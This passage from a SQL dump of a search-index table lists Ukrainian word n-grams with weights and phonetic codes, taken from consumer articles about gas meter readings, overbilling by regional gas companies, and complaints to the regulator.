отже',0,1,1.3667,'р000',1,'*'),(1686507,'року буде','року буде',0,1,1.3,'р000',1,'*'),(1686508,'року буде здійснюватися','року буде здійснюватися',0,1,1.7667,'р000',1,'*'),(1686509,'року будьте','року будьте',0,1,1.3667,'р000',1,'*'),(1686510,'року будьте пильними','року будьте пильними',0,1,1.6667,'р000',1,'*'),(1686511,'року останній','року останній',0,1,1.4333,'р000',1,'*'),(1686512,'року останній день','року останній день',0,1,1.6,'р000',1,'*'),(1686513,'року переконайтесь','року переконайтесь',0,1,1.6,'р000',1,'*'),(1686514,'року переконайтесь що','року переконайтесь що',0,1,1.7,'р000',1,'*'),(1686515,'року по','року по',0,1,1.2333,'р000',2,'*'),(1686516,'року по 30','року по 30',0,1,1.3333,'р000',2,'*'),(1686517,'року усім','року усім',0,1,1.3,'р000',1,'*'),(1686518,'року усім побутовим','року усім побутовим',0,1,1.6333,'р000',1,'*'),(1686519,'року який','року який',0,1,1.3,'р000',1,'*'),(1686520,'року який визначається','року який визначається',0,1,1.7333,'р000',1,'*'),(1686521,'саме на підставі','саме на підставі',0,1,1.5333,'с000',2,'*'),(1686522,'своєму','своєму',0,0,0.4,'с000',1,'*'),(1686523,'своєму облгазу','своєму облгазу',0,1,1.4667,'с000',1,'*'),(1686524,'своєму облгазу фактичні','своєму облгазу фактичні',0,1,1.7667,'с000',1,'*'),(1686525,'себе ошукати','себе ошукати',0,1,1.4,'с000',1,'*'),(1686526,'себе ошукати та','себе ошукати та',0,1,1.5,'с000',1,'*'),(1686527,'споживали','споживали',0,0,0.6,'с000',1,'*'),(1686528,'споживали з','споживали з',0,1,1.3667,'с000',1,'*'),(1686529,'споживали з кодексу','споживали з кодексу',0,1,1.6333,'с000',1,'*'),(1686530,'споживання природного','споживання природного',0,1,1.7,'с000',1,'*'),(1686531,'споживання природного газу','споживання природного газу',0,1,1.8667,'с000',1,'*'),(1686532,'споживача','споживача',0,0,0.6,'с000',1,'*'),(1686533,'споживача за','споживача за',0,1,1.4,'с000',1,'*'),(1686534,'споживача за послугу','споживача за послугу',0,1,1.6667,'с000',1,'*'),(1686535,'споживача на','споживача на',0,1,1.4,'с000',1,'*'),(1686536,'споживача на розрахунковий','споживача на розрахунковий',0,1,1.8667,'с000',1,'*'),(1686537,'споживача на тариф','споживача на тариф',0,1,1.6,'с000',1,'*'),(1686538,'споживача та','споживача та',0,1,1.4,'с000',1,'*'),(1686539,'споживача та оплачуються','споживача та оплачуються',0,1,1.8,'с000',1,'*'),(1686540,'споживачам обов\'язково','споживачам обов',0,1,1.7333,'с000',1,'*'),(1686541,'споживачам обов\'язково необхідно','споживачам обов необхідно',0,1,2,'с000',1,'*'),(1686542,'споживачем','споживачем',0,0,0.6667,'с000',1,'*'),(1686543,'споживачем рівномірними','споживачем рівномірними',0,1,1.7667,'с000',1,'*'),(1686544,'споживачем рівномірними частками','споживачем рівномірними частками',0,1,2,'с000',1,'*'),(1686545,'спожитого','спожитого',0,0,0.6,'с000',2,'*'),(1686546,'спожитого газу','спожитого газу',0,1,1.4667,'с000',2,'*'),(1686547,'спожитого газу за','спожитого газу за',0,1,1.5667,'с000',2,'*'),(1686548,'станом','станом',0,0,0.4,'с000',1,'*'),(1686549,'станом на','станом на',0,1,1.3,'с000',1,'*'),(1686550,'станом на кінець','станом на кінець',0,1,1.5333,'с000',1,'*'),(1686551,'сьогодні закінчується','сьогодні закінчується',0,1,1.7,'с000',1,'*'),(1686552,'сьогодні закінчується газовий','сьогодні закінчується газовий',0,1,1.9667,'с000',1,'*'),(1686553,'та домалювати','та домалювати',0,1,1.4333,'т000',1,'*'),(1686554,'та домалювати вам','та домалювати вам',0,1,1.5667,'т000',1,'*'),(1686555,'та оплачуються','та оплачуються',0,1,1.4667,'т000',1,'*'),(1686556,'та оплачуються споживачем','та оплачуються споживачем',0,1,1.8333,'т000',1,'*'),(1686557,'тариф','тариф',0,0,0.3333,'т000',1,'*'),(1686558,'тариф встановлений','тариф встановлений',0,1,1.6,'т000',1,'*'),(1686559,'тариф встановлений регулятором','тариф встановлений регулятором',0,1,2,'т000',1,'*'),(1686560,'тривав','тривав',0,0,0.4,'т000',1,'*'),(1686561,'тривав з','тривав з',0,1,1.2667,'т000',1,'*'),(1686562,'тривав з 1','тривав з 1',0,1,1.3333,'т000',1,'*'),(1686563,'увага','увага',0,0,0.3333,'у000',1,'*'),(1686564,'увага сьогодні','увага сьогодні',0,1,1.4667,'у000',1,'*'),(1686565,'увага сьогодні закінчується','увага сьогодні закінчується',0,1,1.9,'у000',1,'*'),(1686566,'усім','усім',0,0,0.2667,'у000',1,'*'),(1686567,'усім побутовим','усім побутовим',0,1,1.4667,'у000',1,'*'),(1686568,'усім побутовим споживачам','усім побутовим споживачам',0,1,1.8333,'у000',1,'*'),(1686569,'усього','усього',0,0,0.4,'у000',2,'*'),(1686570,'усього 2022','усього 2022',0,1,1.3667,'у000',2,'*'),(1686571,'усього 2022 року','усього 2022 року',0,1,1.5333,'у000',2,'*'),(1686572,'фактичні покази','фактичні покази',0,1,1.5,'ф000',1,'*'),(1686573,'фактичні покази власного','фактичні покази власного',0,1,1.8,'ф000',1,'*'),(1686574,'фактично','фактично',0,0,0.5333,'ф000',2,'*'),(1686575,'фактично спожитого','фактично спожитого',0,1,1.6,'ф000',2,'*'),(1686576,'фактично спожитого газу','фактично спожитого газу',0,1,1.7667,'ф000',2,'*'),(1686577,'фактичного','фактичного',0,0,0.6667,'ф000',2,'*'),(1686578,'фактичного обсягу','фактичного обсягу',0,1,1.5667,'ф000',1,'*'),(1686579,'фактичного обсягу споживання','фактичного обсягу споживання',0,1,1.9333,'ф000',1,'*'),(1686580,'цією','цією',0,0,0.2667,'ц000',1,'*'),(1686581,'цією главою','цією главою',0,1,1.3667,'ц000',1,'*'),(1686582,'цим об\'єктом','цим об',0,1,1.4,'ц000',1,'*'),(1686583,'цим об\'єктом за','цим об за',0,1,1.5,'ц000',1,'*'),(1686584,'цього кодексу','цього кодексу',0,1,1.4333,'ц000',1,'*'),(1686585,'цього кодексу крім','цього кодексу крім',0,1,1.6,'ц000',1,'*'),(1686586,'частками','частками',0,0,0.5333,'ч000',1,'*'),(1686587,'частками протягом','частками протягом',0,1,1.5667,'ч000',1,'*'),(1686588,'частками протягом календарного','частками протягом календарного',0,1,2,'ч000',1,'*'),(1686589,'що ваші','що ваші',0,1,1.2333,'щ000',1,'*'),(1686590,'що ваші покази','що ваші покази',0,1,1.4667,'щ000',1,'*'),(1686591,'що надається','що надається',0,1,1.4,'щ000',1,'*'),(1686592,'що надається оператором','що надається оператором',0,1,1.7667,'щ000',1,'*'),(1686593,'що передував','що передував',0,1,1.4,'щ000',1,'*'),(1686594,'що передував розрахунковому','що передував розрахунковому',0,1,1.9,'щ000',1,'*'),(1686595,'щомісячної','щомісячної',0,0,0.6667,'щ000',2,'*'),(1686596,'щомісячної плати','щомісячної плати',0,1,1.5333,'щ000',2,'*'),(1686597,'щомісячної плати за','щомісячної плати за',0,1,1.6333,'щ000',2,'*'),(1686598,'як добуток','як добуток',0,1,1.3333,'я000',1,'*'),(1686599,'як добуток 1','як добуток 1',0,1,1.4,'я000',1,'*'),(1686600,'який визначається','який визначається',0,1,1.5667,'я000',1,'*'),(1686601,'який визначається відповідно','який визначається відповідно',0,1,1.9333,'я000',1,'*'),(1686602,'який тривав','який тривав',0,1,1.3667,'я000',1,'*'),(1686603,'який тривав з','який тривав з',0,1,1.4333,'я000',1,'*'),(1686604,'яких ви','яких ви',0,1,1.2333,'я000',1,'*'),(1686605,'яких ви насправді','яких ви насправді',0,1,1.5667,'я000',1,'*'),(1688137,'2 2536','2 2536',0,1,1.2,'',1,'*'),(1688138,'2 2536 shcho','2 2536 shcho',0,1,1.4,'S000',1,'*'),(1688139,'2021 pretenziia','2021 pretenziia',0,1,1.5,'P6352',1,'*'),(1688140,'2021 pretenziia do','2021 pretenziia do',0,1,1.6,'P63523',1,'*'),(1688141,'2021 skarga','2021 skarga',0,1,1.3667,'S620',1,'*'),(1688142,'2021 skarga do','2021 skarga do',0,1,1.4667,'S623',1,'*'),(1688143,'2021 року облгаз','2021 року облгаз',0,1,1.5333,'р000',1,'*'),(1688144,'2022 року за','2022 року за',0,1,1.4,'р000',1,'*'),(1688145,'2022 року та','2022 року та',0,1,1.4,'р000',1,'*'),(1688146,'2022 році','2022 році',0,1,1.3,'р000',1,'*'),(1688147,'2022 році адже','2022 році адже',0,1,1.4667,'р000',1,'*'),(1688148,'2536','2536',0,0,0.4,'',1,'*'),(1688149,'2536 shcho','2536 shcho',0,1,1.3333,'S000',1,'*'),(1688150,'2536 shcho robiti','2536 shcho robiti',0,1,1.5667,'S613',1,'*'),(1688151,'6 числа','6 числа',0,1,1.2333,'ч000',1,'*'),(1688152,'6 числа календарного','6 числа календарного',0,1,1.6667,'ч000',1,'*'),(1688153,'com ua images','com ua images',0,1,1.4333,'C520',1,'*'),(1688154,'do nkrekp','do nkrekp',0,1,1.3,'D52621',1,'*'),(1688155,'do nkrekp pokaz','do nkrekp pokaz',0,1,1.5,'D526212',1,'*'),(1688156,'do oblgaz','do oblgaz',0,1,1.3,'D142',1,'*'),(1688157,'do oblgaz pokaz','do oblgaz pokaz',0,1,1.5,'D14212',1,'*'),(1688158,'doc','doc',0,0,0.2,'D200',1,'*'),(1688159,'doc зазначимо','doc зазначимо',0,1,1.4333,'D200',1,'*'),(1688160,'doc зазначимо що','doc зазначимо що',0,1,1.5333,'D200',1,'*'),(1688161,'doc скарга','doc скарга',0,1,1.3333,'D200',1,'*'),(1688162,'doc скарга до','doc скарга до',0,1,1.4333,'D200',1,'*'),(1688163,'images','images',0,0,0.4,'I520',1,'*'),(1688164,'images 2021','images 2021',0,1,1.3667,'I520',1,'*'),(1688165,'images 2021 pretenziia','images 2021 pretenziia',0,1,1.7333,'I5216352',1,'*'),(1688166,'images 2021 skarga','images 2021 skarga',0,1,1.6,'I5262',1,'*'),(1688167,'j vimagae','j vimagae',0,1,1.3,'J152',1,'*'),(1688168,'j vimagae splatiti','j vimagae splatiti',0,1,1.6,'J152143',1,'*'),(1688169,'kubi','kubi',0,0,0.2667,'K100',1,'*'),(1688170,'lich','lich',0,0,0.2667,'L200',1,'*'),(1688171,'lich doc','lich doc',0,1,1.2667,'L232',1,'*'),(1688172,'lich doc зазначимо','lich doc зазначимо',0,1,1.6,'L232',1,'*'),(1688173,'lich doc скарга','lich doc скарга',0,1,1.5,'L232',1,'*'),(1688174,'lichilnika','lichilnika',0,0,0.6667,'L2452',1,'*'),(1688175,'lichilnika j','lichilnika j',0,1,1.4,'L2452',1,'*'),(1688176,'lichilnika j vimagae','lichilnika j vimagae',0,1,1.6667,'L2452152',1,'*'),(1688177,'ne vrakhovue','ne vrakhovue',0,1,1.4,'N1621',1,'*'),(1688178,'ne vrakhovue pokazniki','ne vrakhovue pokazniki',0,1,1.7333,'N1621252',1,'*'),(1688179,'nkrekp','nkrekp',0,0,0.4,'N2621',1,'*'),(1688180,'nkrekp pokaz','nkrekp pokaz',0,1,1.4,'N26212',1,'*'),(1688181,'nkrekp pokaz lich','nkrekp pokaz lich',0,1,1.5667,'N2621242',1,'*'),(1688182,'novini 2 2536','novini 2 2536',0,1,1.4333,'N150',1,'*'),(1688183,'oblgaz','oblgaz',0,0,0.4,'O142',1,'*'),(1688184,'oblgaz ne','oblgaz ne',0,1,1.3,'O1425',1,'*'),(1688185,'oblgaz ne vrakhovue','oblgaz ne vrakhovue',0,1,1.6333,'O14251621',1,'*'),(1688186,'oblgaz pokaz','oblgaz pokaz',0,1,1.4,'O14212',1,'*'),(1688187,'oblgaz pokaz lich','oblgaz pokaz lich',0,1,1.5667,'O1421242',1,'*'),(1688188,'pokaz','pokaz',0,0,0.3333,'P200',1,'*'),(1688189,'pokaz lich','pokaz lich',0,1,1.3333,'P242',1,'*'),(1688190,'pokaz lich doc','pokaz lich doc',0,1,1.4667,'P24232',1,'*'),(1688191,'pokazniki','pokazniki',0,0,0.6,'P252',1,'*'),(1688192,'pokazniki vashogo','pokazniki vashogo',0,1,1.5667,'P25212',1,'*'),(1688193,'pokazniki vashogo lichilnika','pokazniki vashogo lichilnika',0,1,1.9333,'P2521242452',1,'*'),(1688194,'pretenziia','pretenziia',0,0,0.6667,'P6352',1,'*'),(1688195,'pretenziia do','pretenziia do',0,1,1.4333,'P63523',1,'*'),(1688196,'pretenziia do oblgaz','pretenziia do oblgaz',0,1,1.6667,'P63523142',1,'*'),(1688197,'robiti','robiti',0,0,0.4,'R130',1,'*'),(1688198,'robiti yakshcho','robiti yakshcho',0,1,1.5,'R132',1,'*'),(1688199,'robiti yakshcho oblgaz','robiti yakshcho oblgaz',0,1,1.7333,'R132142',1,'*'),(1688200,'shcho robiti','shcho robiti',0,1,1.4,'S613',1,'*'),(1688201,'shcho robiti yakshcho','shcho robiti yakshcho',0,1,1.7,'S6132',1,'*'),(1688202,'skarga','skarga',0,0,0.4,'S620',1,'*'),(1688203,'skarga do','skarga do',0,1,1.3,'S623',1,'*'),(1688204,'skarga do nkrekp','skarga do nkrekp',0,1,1.5333,'S62352621',1,'*'),(1688205,'splatiti','splatiti',0,0,0.5333,'S143',1,'*'),(1688206,'splatiti za','splatiti za',0,1,1.3667,'S1432',1,'*'),(1688207,'splatiti za zajvi','splatiti za zajvi',0,1,1.5667,'S14321',1,'*'),(1688208,'ua images','ua images',0,1,1.3,'U520',1,'*'),(1688209,'ua images 2021','ua images 2021',0,1,1.4667,'U520',1,'*'),(1688210,'vashogo','vashogo',0,0,0.4667,'V200',1,'*'),(1688211,'vashogo lichilnika','vashogo lichilnika',0,1,1.6,'V242452',1,'*'),(1688212,'vashogo lichilnika j','vashogo lichilnika j',0,1,1.6667,'V242452',1,'*'),(1688213,'vimagae','vimagae',0,0,0.4667,'V520',1,'*'),(1688214,'vimagae splatiti','vimagae splatiti',0,1,1.5333,'V52143',1,'*'),(1688215,'vimagae splatiti za','vimagae splatiti za',0,1,1.6333,'V521432',1,'*'),(1688216,'vrakhovue','vrakhovue',0,0,0.6,'V621',1,'*'),(1688217,'vrakhovue pokazniki','vrakhovue pokazniki',0,1,1.6333,'V621252',1,'*'),(1688218,'vrakhovue pokazniki vashogo','vrakhovue pokazniki vashogo',0,1,1.9,'V62125212',1,'*'),(1688219,'yakshcho','yakshcho',0,0,0.5333,'Y200',1,'*'),(1688220,'yakshcho oblgaz','yakshcho oblgaz',0,1,1.5,'Y2142',1,'*'),(1688221,'yakshcho oblgaz ne','yakshcho oblgaz ne',0,1,1.6,'Y21425',1,'*'),(1688222,'za zajvi','za zajvi',0,1,1.2667,'Z100',1,'*'),(1688223,'za zajvi kubi','za zajvi kubi',0,1,1.4333,'Z121',1,'*'),(1688224,'zajvi','zajvi',0,0,0.3333,'Z100',1,'*'),(1688225,'zajvi kubi','zajvi kubi',0,1,1.3333,'Z121',1,'*'),(1688226,'«зайві»','«зайві»',0,0,0.4667,'з000',1,'*'),(1688227,'«зайві» куби','«зайві» куби',0,1,1.4,'з000',1,'*'),(1688228,'ігнорує','ігнорує',0,0,0.4667,'і000',1,'*'),(1688229,'ігнорує звернення','ігнорує звернення',0,1,1.5667,'і000',1,'*'),(1688230,'ігнорує звернення або','ігнорує звернення або',0,1,1.7,'і000',1,'*'),(1688231,'ігнорують','ігнорують',0,0,0.6,'і000',1,'*'),(1688232,'ігнорують вчасно','ігнорують вчасно',0,1,1.5333,'і000',1,'*'),(1688233,'ігнорують вчасно передані','ігнорують вчасно передані',0,1,1.8333,'і000',1,'*'),(1688234,'інформаційно-консультаційного','інформаційно-консультаційного',0,0,1,'і000',1,'*'),(1688235,'інформаційно-консультаційного центру','інформаційно-консультаційного центру',0,1,2,'і000',1,'*'),(1688236,'інформаційно-консультаційного центру газправда','інформаційно-консультаційного центру газправда',0,1,2,'і000',1,'*'),(1688237,'інформацію тобто','інформацію тобто',0,1,1.5333,'і000',1,'*'),(1688238,'інформацію тобто пізніше','інформацію тобто пізніше',0,1,1.8,'і000',1,'*'),(1688239,'інші показники','інші показники',0,1,1.4667,'і000',1,'*'),(1688240,'інші показники значно','інші показники значно',0,1,1.7,'і000',1,'*'),(1688241,'а також одразу','а також одразу',0,1,1.4667,'а000',1,'*'),(1688242,'або відмовляє','або відмовляє',0,1,1.4333,'а000',1,'*'),(1688243,'або відмовляє споживачам','або відмовляє споживачам',0,1,1.8,'а000',1,'*'),(1688244,'адже часто','адже часто',0,1,1.3333,'а000',1,'*'),(1688245,'адже часто газорозподільна','адже часто газорозподільна',0,1,1.8667,'а000',1,'*'),(1688246,'би','би',0,0,0.1333,'б000',1,'*'),(1688247,'би звернути','би звернути',0,1,1.3667,'б000',1,'*'),(1688248,'би звернути свою','би звернути свою',0,1,1.5333,'б000',1,'*'),(1688249,'блакитного','блакитного',0,0,0.6667,'б000',1,'*'),(1688250,'блакитного палива','блакитного палива',0,1,1.5667,'б000',1,'*'),(1688251,'блакитного палива у','блакитного палива у',0,1,1.6333,'б000',1,'*'),(1688252,'бланки','бланки',0,0,0.4,'б000',1,'*'),(1688253,'бланки також','бланки також',0,1,1.4,'б000',1,'*'),(1688254,'бланки також претензію','бланки також претензію',0,1,1.7333,'б000',1,'*'),(1688255,'буде здійснювати','буде здійснювати',0,1,1.5333,'б000',1,'*'),(1688256,'буде здійснювати розрахунок','буде здійснювати розрахунок',0,1,1.9,'б000',1,'*'),(1688257,'в зверненнях','в зверненнях',0,1,1.4,'в000',1,'*'),(1688258,'в зверненнях до','в зверненнях до',0,1,1.5,'в000',1,'*'),(1688259,'в особистих','в особистих',0,1,1.3667,'в000',1,'*'),(1688260,'в особистих кабінетах','в особистих кабінетах',0,1,1.7,'в000',1,'*'),(1688261,'в поточному','в поточному',0,1,1.3667,'в000',1,'*'),(1688262,'в поточному газовому','в поточному газовому',0,1,1.6667,'в000',1,'*'),(1688263,'в розділі','в розділі',0,1,1.3,'в000',1,'*'),(1688264,'в розділі бланки','в розділі бланки',0,1,1.5333,'в000',1,'*'),(1688265,'відмовляє','відмовляє',0,0,0.6,'в000',1,'*'),(1688266,'відмовляє споживачам','відмовляє споживачам',0,1,1.6667,'в000',1,'*'),(1688267,'відмовляє споживачам тому','відмовляє споживачам тому',0,1,1.8333,'в000',1,'*'),(1688268,'відмовляються','відмовляються',0,0,0.8667,'в000',1,'*'),(1688269,'відмовляються коригувати','відмовляються коригувати',0,1,1.8,'в000',1,'*'),(1688270,'відмовляються коригувати показники','відмовляються коригувати показники',0,1,2,'в000',1,'*'),(1688271,'відповідну інформацію','відповідну інформацію',0,1,1.7,'в000',1,'*'),(1688272,'відповідну інформацію тобто','відповідну інформацію тобто',0,1,1.9,'в000',1,'*'),(1688273,'вашого','вашого',0,0,0.4,'в000',1,'*'),(1688274,'вашого лічильника','вашого лічильника',0,1,1.5667,'в000',1,'*'),(1688275,'вашого лічильника й','вашого лічильника й',0,1,1.6333,'в000',1,'*'),(1688276,'вже з','вже з',0,1,1.1667,'в000',1,'*'),(1688277,'вже з січня','вже з січня',0,1,1.3667,'в000',1,'*'),(1688278,'вимагає сплатити','вимагає сплатити',0,1,1.5333,'в000',1,'*'),(1688279,'вимагає сплатити за','вимагає сплатити за',0,1,1.6333,'в000',1,'*'),(1688280,'виставляються','виставляються',0,0,0.8667,'в000',1,'*'),(1688281,'виставляються інші','виставляються інші',0,1,1.6,'в000',1,'*'),(1688282,'виставляються інші показники','виставляються інші показники',0,1,1.9333,'в000',1,'*'),(1688283,'вищі','вищі',0,0,0.2667,'в000',1,'*'),(1688284,'вищі ніж','вищі ніж',0,1,1.2667,'в000',1,'*'),(1688285,'вищі ніж споживачі','вищі ніж споживачі',0,1,1.6,'в000',1,'*'),(1688286,'враховує','враховує',0,0,0.5333,'в000',1,'*'),(1688287,'враховує показники','враховує показники',0,1,1.6,'в000',1,'*'),(1688288,'враховує показники вашого','враховує показники вашого',0,1,1.8333,'в000',1,'*'),(1688289,'вчасно','вчасно',0,0,0.4,'в000',1,'*'),(1688290,'вчасно передані','вчасно передані',0,1,1.5,'в000',1,'*'),(1688291,'вчасно передані домогосподарствами','вчасно передані домогосподарствами',0,1,2,'в000',1,'*'),(1688292,'газових','газових',0,0,0.4667,'г000',1,'*'),(1688293,'газових лічильників','газових лічильників',0,1,1.6333,'г000',1,'*'),(1688294,'газових лічильників як','газових лічильників як',0,1,1.7333,'г000',1,'*'),(1688295,'газовому','газовому',0,0,0.5333,'г000',1,'*'),(1688296,'газовому році','газовому році',0,1,1.4333,'г000',1,'*'),(1688297,'газовому році з','газовому році з',0,1,1.5,'г000',1,'*'),(1688298,'газорозподільна','газорозподільна',0,0,1,'г000',1,'*'),(1688299,'газорозподільна компанія','газорозподільна компанія',0,1,1.8,'г000',1,'*'),(1688300,'газорозподільна компанія просто','газорозподільна компанія просто',0,1,2,'г000',1,'*'),(1688301,'газправда облгази','газправда облгази',0,1,1.5667,'г000',1,'*'),(1688302,'газправда облгази ігнорують','газправда облгази ігнорують',0,1,1.9,'г000',1,'*'),(1688303,'газправда підготувала','газправда підготувала',0,1,1.7,'г000',1,'*'),(1688304,'газправда підготувала зразки','газправда підготувала зразки',0,1,1.9333,'г000',1,'*'),(1688305,'газправди радять','газправди радять',0,1,1.5333,'г000',1,'*'),(1688306,'газправди радять подавати','газправди радять подавати',0,1,1.8333,'г000',1,'*'),(1688307,'газу домогосподарствами','газу домогосподарствами',0,1,1.7667,'г000',1,'*'),(1688308,'газу домогосподарствами в','газу домогосподарствами в',0,1,1.8333,'г000',1,'*'),(1688309,'до інформаційно-консультаційного','до інформаційно-консультаційного',0,1,2,'д000',1,'*'),(1688310,'до інформаційно-консультаційного центру','до інформаційно-консультаційного центру',0,1,2,'д000',1,'*'),(1688311,'до нкрекп','до нкрекп',0,1,1.3,'д000',1,'*'),(1688312,'до нкрекп адже','до нкрекп адже',0,1,1.4667,'д000',1,'*'),(1688313,'до облгазу','до облгазу',0,1,1.3333,'д000',1,'*'),(1688314,'до облгазу а','до облгазу а',0,1,1.4,'д000',1,'*'),(1688315,'до облгазу щодо','до облгазу щодо',0,1,1.5,'д000',1,'*'),(1688316,'до регулятора','до регулятора',0,1,1.4333,'д000',1,'*'),(1688317,'до регулятора про','до регулятора про',0,1,1.5667,'д000',1,'*'),(1688318,'документи','документи',0,0,0.6,'д000',1,'*'),(1688319,'документи розміщені','документи розміщені',0,1,1.6333,'д000',1,'*'),(1688320,'документи розміщені на','документи розміщені на',0,1,1.7333,'д000',1,'*'),(1688321,'домогосподарствами','домогосподарствами',0,0,1,'д000',1,'*'),(1688322,'домогосподарствами в','домогосподарствами в',0,1,1.6667,'д000',1,'*'),(1688323,'домогосподарствами в поточному','домогосподарствами в поточному',0,1,2,'д000',1,'*'),(1688324,'домогосподарствами показники','домогосподарствами показники',0,1,1.9333,'д000',1,'*'),(1688325,'домогосподарствами показники лічильників','домогосподарствами показники лічильників',0,1,2,'д000',1,'*'),(1688326,'домогосподарству вже','домогосподарству вже',0,1,1.6667,'д000',1,'*'),(1688327,'домогосподарству вже з','домогосподарству вже з',0,1,1.7333,'д000',1,'*'),(1688328,'доставку розподіл','доставку розподіл',0,1,1.5667,'д000',1,'*'),(1688329,'доставку розподіл блакитного','доставку розподіл блакитного',0,1,1.9333,'д000',1,'*'),(1688330,'доставку розподіл газу','доставку розподіл газу',0,1,1.7333,'д000',1,'*'),(1688331,'доступна','доступна',0,0,0.5333,'д000',1,'*'),(1688332,'доступна за','доступна за',0,1,1.3667,'д000',1,'*'),(1688333,'доступна за посиланням','доступна за посиланням',0,1,1.7333,'д000',1,'*'),(1688334,'експерти','експерти',0,0,0.5333,'е000',1,'*'),(1688335,'експерти газправди','експерти газправди',0,1,1.6,'е000',1,'*'),(1688336,'експерти газправди радять','експерти газправди радять',0,1,1.8333,'е000',1,'*'),(1688337,'з ймовірних','з ймовірних',0,1,1.3667,'з000',1,'*'),(1688338,'з ймовірних причин','з ймовірних причин',0,1,1.6,'з000',1,'*'),(1688339,'з метою отримання','з метою отримання',0,1,1.5667,'з000',1,'*'),(1688340,'з показниками','з показниками',0,1,1.4333,'з000',1,'*'),(1688341,'з показниками газових','з показниками газових',0,1,1.7,'з000',1,'*'),(1688342,'з січня','з січня',0,1,1.2333,'з000',1,'*'),(1688343,'з січня 2022','з січня 2022',0,1,1.4,'з000',1,'*'),(1688344,'за «зайві»','за «зайві»',0,1,1.3333,'з000',1,'*'),(1688345,'за «зайві» куби','за «зайві» куби',0,1,1.5,'з000',1,'*'),(1688346,'за доставку розподіл','за доставку розподіл',0,1,1.6667,'з000',1,'*'),(1688347,'за розрахунковим','за розрахунковим',0,1,1.5333,'з000',1,'*'),(1688348,'за розрахунковим у','за розрахунковим у',0,1,1.6,'з000',1,'*'),(1688349,'за фактичними','за фактичними',0,1,1.4333,'з000',1,'*'),(1688350,'за фактичними показниками','за фактичними показниками',0,1,1.8333,'з000',1,'*'),(1688351,'завищених','завищених',0,0,0.6,'з000',1,'*'),(1688352,'завищених показів','завищених показів',0,1,1.5667,'з000',1,'*'),(1688353,'завищених показів лічильників','завищених показів лічильників',0,1,1.9667,'з000',1,'*'),(1688354,'завищених показників','завищених показників',0,1,1.6667,'з000',1,'*'),(1688355,'завищених показників лічильника','завищених показників лічильника',0,1,2,'з000',1,'*'),(1688356,'завищення','завищення',0,0,0.6,'з000',1,'*'),(1688357,'завищення фактичного','завищення фактичного',0,1,1.6667,'з000',1,'*'),(1688358,'завищення фактичного споживання','завищення фактичного споживання',0,1,2,'з000',1,'*'),(1688359,'зазначимо','зазначимо',0,0,0.6,'з000',1,'*'),(1688360,'зазначимо що','зазначимо що',0,1,1.4,'з000',1,'*'),(1688361,'зазначимо що одна','зазначимо що одна',0,1,1.5667,'з000',1,'*'),(1688362,'звернення','звернення',0,0,0.6,'з000',1,'*'),(1688363,'звернення або','звернення або',0,1,1.4333,'з000',1,'*'),(1688364,'звернення або відмовляє','звернення або відмовляє',0,1,1.7667,'з000',1,'*'),(1688365,'зверненнях','зверненнях',0,0,0.6667,'з000',1,'*'),(1688366,'зверненнях до','зверненнях до',0,1,1.4333,'з000',1,'*'),(1688367,'зверненнях до інформаційно-консультаційного','зверненнях до інформаційно-консультаційного',0,1,2,'з000',1,'*'),(1688368,'звернути','звернути',0,0,0.5333,'з000',1,'*'),(1688369,'звернути свою','звернути свою',0,1,1.4333,'з000',1,'*'),(1688370,'звернути свою увагу','звернути свою увагу',0,1,1.6333,'з000',1,'*'),(1688371,'здійснення','здійснення',0,0,0.6667,'з000',1,'*'),(1688372,'здійснення перерахунку','здійснення перерахунку',0,1,1.7333,'з000',1,'*'),(1688373,'здійснення перерахунку за','здійснення перерахунку за',0,1,1.8333,'з000',1,'*'),(1688374,'здійснювати','здійснювати',0,0,0.7333,'з000',1,'*'),(1688375,'здійснювати розрахунок','здійснювати розрахунок',0,1,1.7333,'з000',1,'*'),(1688376,'здійснювати розрахунок щомісячної','здійснювати розрахунок щомісячної',0,1,2,'з000',1,'*'),(1688377,'значно','значно',0,0,0.4,'з000',1,'*'),(1688378,'значно вищі','значно вищі',0,1,1.3667,'з000',1,'*'),(1688379,'значно вищі ніж','значно вищі ніж',0,1,1.5,'з000',1,'*'),(1688380,'зразки','зразки',0,0,0.4,'з000',1,'*'),(1688381,'зразки таких','зразки таких',0,1,1.4,'з000',1,'*'),(1688382,'зразки таких претензій','зразки таких претензій',0,1,1.7333,'з000',1,'*'),(1688383,'й вимагає','й вимагає',0,1,1.3,'й000',1,'*'),(1688384,'й вимагає сплатити','й вимагає сплатити',0,1,1.6,'й000',1,'*'),(1688385,'йдеться','йдеться',0,0,0.4667,'й000',1,'*'),(1688386,'йдеться в','йдеться в',0,1,1.3,'й000',1,'*'),(1688387,'йдеться в зверненнях','йдеться в зверненнях',0,1,1.6667,'й000',1,'*'),(1688388,'ймовірних','ймовірних',0,0,0.6,'й000',1,'*'),(1688389,'ймовірних причин','ймовірних причин',0,1,1.5333,'й000',1,'*'),(1688390,'ймовірних причин подібних','ймовірних причин подібних',0,1,1.8333,'й000',1,'*'),(1688391,'кабінетах','кабінетах',0,0,0.6,'к000',1,'*'),(1688392,'кабінетах незважаючи','кабінетах незважаючи',0,1,1.6667,'к000',1,'*'),(1688393,'кабінетах незважаючи на','кабінетах незважаючи на',0,1,1.7667,'к000',1,'*'),(1688394,'календарного місяця','календарного місяця',0,1,1.6333,'к000',1,'*'),(1688395,'календарного місяця що','календарного місяця що',0,1,1.7333,'к000',1,'*'),(1688396,'кожному домогосподарству вже','кожному домогосподарству вже',0,1,1.9333,'к000',1,'*'),(1688397,'компанія просто','компанія просто',0,1,1.5,'к000',1,'*'),(1688398,'компанія просто ігнорує','компанія просто ігнорує',0,1,1.7667,'к000',1,'*'),(1688399,'коригувати','коригувати',0,0,0.6667,'к000',1,'*'),(1688400,'коригувати показники','коригувати показники',0,1,1.6667,'к000',1,'*'),(1688401,'коригувати показники лічильників','коригувати показники лічильників',0,1,2,'к000',1,'*'),(1688402,'лічильників','лічильників',0,0,0.7333,'л000',1,'*'),(1688403,'лічильників до','лічильників до',0,1,1.4667,'л000',1,'*'),(1688404,'лічильників до облгазу','лічильників до облгазу',0,1,1.7333,'л000',1,'*'),(1688405,'лічильників мотивуючи','лічильників мотивуючи',0,1,1.7,'л000',1,'*'),(1688406,'лічильників мотивуючи це','лічильників мотивуючи це',0,1,1.8,'л000',1,'*'),(1688407,'лічильників натомість','лічильників натомість',0,1,1.7,'л000',1,'*'),(1688408,'лічильників натомість споживачам','лічильників натомість споживачам',0,1,2,'л000',1,'*'),(1688409,'лічильників як','лічильників як',0,1,1.4667,'л000',1,'*'),(1688410,'лічильників як йдеться','лічильників як 